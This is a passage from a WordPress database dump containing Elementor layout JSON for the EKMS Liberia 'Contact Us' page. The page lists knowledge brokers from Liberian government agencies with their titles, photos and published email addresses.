href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b2d79ff\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f970049\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"239344d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"6ab7cf6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Francis W. Mwah<\\/strong><br>\\n\\nDirector @ MOA<br>\\n\\n<a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John Willabo Johnson <\\/strong><br>\\n\\nAssistant Minister, MME<br>\\n\\n<a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Urias Garsinii <\\/strong><br>\\nLand Use Management Manager, LLA<br>\\n<a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Aaron S.M. Wesseh<\\/strong><br>\\n\\nManager, CCCD Project<br>\\n\\n<a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"310af85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"8523c31\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(14911,2368,'_elementor_edit_mode','builder'),(14912,2368,'_elementor_template_type','wp-page'),(14913,2368,'_elementor_version','2.7.5'),(14914,2368,'_wp_page_template','default'),(14915,2368,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk.<\\/a>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"a3861ab\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"20\"},\"elements\":[{\"id\":\"65e4128\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"d8b2d45\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_manager_UV.jpg\",\"id\":2315},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"aa147aa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact Form Coming up\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BJ-1.jpg\",\"id\":2357},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b0aaead\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"0aa0634\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"56a5d75\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>J.S. Datuama Cammue<\\/strong><br>\\n\\nMEAs Officer, EPA<br>\\n\\nUNCBD Focal Point<br>\\n\\n<a href=\\\"mailto:jcammue@epa.gov.lr\\\">jcammue@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f847b48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"643defa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Benjamin Karmorh<\\/strong><br>\\n\\nMEAs Coordinator, EPA<br>\\n\\nUNFCCC Focal Point<br>\\n\\n<a href=\\\"mailto:bkarmorh@epa.gov.lr\\\">bkarmorh@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"509b314\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"98a945e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Berexford S. Jallah<\\/strong><br>\\nGIS Coordinator, EPA<br>\\nUNCCD Focal Point<br>\\n<a href=\\\"mailto:bjallah@epa.gov.lr\\\">bjallah@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_KT.jpg\",\"id\":2360},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6b5064d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"0ffa3a0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr<\\/strong>\\n\\nCoordinator Climate Change Secretariat, EPA\\n\\n<a href=\\\"mailto:jjallah@epa.gov.lr\\\">jjallah@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5d6e5e3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"46e908a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John K. Jallah<\\/strong><br>\\n\\nManager, Compliance and Enforcement, EPA<br>\\n\\n<a href=\\\"mailto:bkarmorh@epa.gov.lr\\\">bkarmorh@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c31131b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"65f189c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Kawusu Toure<\\/strong><br>\\nAssistant Manager, ESIA, EPA<br>\\n<a href=\\\"mailto:kawumtoure@gmail.com\\\">kawumtoure@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Konikay Nimely<\\/strong><br>\\n\\nEIA Manager, FDA<br>\\n\\n<a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Edward S. Kamara<\\/strong><br>\\n\\nMarketing and Forest Forecast<br>\\n\\n<a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Blamah Goll<\\/strong><br>\\nConservation Manager, FDA<br>\\n<a href=\\\"mailto:blamag@gmail.com\\\">blamag@gmail.com<\\/a><br>\\n<a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b2d79ff\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f970049\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"239344d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"6ab7cf6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_